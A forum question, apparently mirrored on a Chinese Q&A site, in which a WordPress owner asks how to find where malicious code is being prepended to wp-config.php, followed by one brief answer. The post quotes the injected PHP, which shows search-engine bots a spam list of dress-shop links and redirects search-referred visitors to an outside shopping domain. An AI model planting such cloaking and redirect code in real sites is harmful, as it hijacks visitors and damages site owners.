doubi1931 2016-03-07 10:52
浏览 87

如何跟踪注入wp-config.php的头重定向

I have the code being injected into one of my sites. I can't find the culprit. I downloaded the site with BackupBuddy, and it showed the injected code, which is the following:

    <?php

    $referer = $_SERVER['HTTP_REFERER'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];

    $tmp = strtolower($_SERVER['HTTP_USER_AGENT']);

    if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'bing') !== false || 

    strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) {




    cheongsam dress => "http://www.cozyladywear.com/qipao-cheongsam-c-87.html",
    cheongsam dresses => "http://www.goodorient.com/Dresses_C115",
    cheongsam style dress => "https://www.pinterest.com/explore/cheongsam-modern/",
    cheongsam dress pattern => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
    dress cheongsam => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
    cheongsam dresses for sale => "http://modernqipao.com/",
    red cheongsam dress => "http://redchinesedress.com/product-category/cheongsam-qipao/",
    black cheongsam dress => "https://www.etsy.com/market/black_cheongsam",
    cheongsam evening dress => "http://yannyexpress.com/collections/wedding-qipao-cheongsam",
    cheongsam dress for sale => "http://www.dresswe.com/cheongsam-dresses-103948/",
    short cheongsam dresses => "http://www.elegente.com/short-cheongsam",
    cheongsam inspired dresses => "https://www.pinterest.com/friedwontons4u/the-modern-girls-guide-to-cheongsamqipao/",
    lace cheongsam dress => "http://modernqipao.com/product-category/material/lace/",
    silk cheongsam dress => "http://www.efushop.com/index.php/goods/category/Silk-Brocade-cheongsam",
    vintage cheongsam dress => "https://www.etsy.com/market/vintage_cheongsam",
    blue cheongsam dress => "http://modernqipao.com/product-tag/blue/",
    purple cheongsam dress => "http://modernqipao.com/product-tag/purple-lavender-color/",
    white cheongsam dress => "https://www.pinterest.com/explore/cheongsam-wedding/",
    cotton cheongsam dress => "http://www.efushop.com/index.php/goods/category/Cotton-cheongsam",
    cheongsam dress sewing pattern => "http://vintagepatterns.wikia.com/wiki/Category:Cheongsam",
    cheongsam prom dress => "http://www.cozyladywear.com/fuchsia-fishtail-cheongsam-qipao-chinese-wedding-prom-dress-p-611.html",
    cheongsam inspired dress => "https://www.etsy.com/market/qipao",
    gold cheongsam dress => "http://modernqipao.com/product/gold-circled-lace-modern-mini-qipao-sexy-chinese-cheongsam-dress/",
    cheongsam dinner dress => "https://www.pinterest.com/yannyexpress/wedding-qipao-cheongsam-bridal-kwa-qun-couture-eve/",
    cheongsam bridesmaid dresses => "https://www.pinterest.com/explore/chinese-wedding-dresses/",
    pink cheongsam dress => "http://modernqipao.com/product-tag/pink-peach-champagne/",
    cheongsam short dress => "https://www.pinterest.com/cozyladywear/qipao-cheongsam/",
    hot cheongsam dress => "http://www.idreammart.com/chinese-dresses/2015-hot-cheongsam-chinese-dresses.html",
    cheongsam dresses uk => "http://www.kaiizhang.co.uk/",
    chinese traditional dress => "https://en.wikipedia.org/wiki/Chinese_clothing",
    traditional chinese dress => "http://www.travelchinaguide.com/intro/clothing/",
    traditional chinese dresses => "http://www.chinatoday.com/culture/qipao/qipao.htm",
    chinese dress traditional => "https://en.wikipedia.org/wiki/Cheongsam",


    );

            exit;
    }
    //
    $from_search_engine = false;
    $jump_referer = array('google','bing','yahoo','msn','ask','yandex','aol');
    foreach($jump_referer as $ref){
        $ref_rst = stripos($referer,$ref);
        if($ref_rst > -1){
            $from_search_engine=true;
            break;
        }
    }

    if($from_search_engine){
        header("Location: http://www.acc2buy.com/");
        exit;
    }
    ?>

This code is at the very top of wp-config.php - however, when I login via FTP, this code isn't there. So it's redirecting all users that try to come via a search engine.

How would I go about tracking down the actual injection file? I've already GREPped everything, looking for any references to wp-config.php.

I have also started with index.php, and worked my way through wp-blog-head.php and wp-load.php - I can't seem to find where it's being prepended.

Thanks in advance guys!

  • 写回答

1条回答 默认 最新

  • douhaoqiao9304 2016-03-22 05:37
    关注

    I have checked your issue, Do one thing just zipped this file as backup and delete the existing file after changing the host,username and password

    some times the code is not shown while viewing the code in cpanel so best way is to upload new file after changes and delete old one

    Hope you get the solution feel free to ask any malware related query :)

    评论

报告相同问题?

悬赏问题

  • ¥15 写一个方法checkPerson,入参实体类Person,出参布尔值
  • ¥15 我想咨询一下路面纹理三维点云数据处理的一些问题,上传的坐标文件里是怎么对无序点进行编号的,以及xy坐标在处理的时候是进行整体模型分片处理的吗
  • ¥15 CSAPPattacklab
  • ¥15 一直显示正在等待HID—ISP
  • ¥15 Python turtle 画图
  • ¥15 关于大棚监测的pcb板设计
  • ¥15 stm32开发clion时遇到的编译问题
  • ¥15 lna设计 源简并电感型共源放大器
  • ¥15 如何用Labview在myRIO上做LCD显示?(语言-开发语言)
  • ¥15 Vue3地图和异步函数使用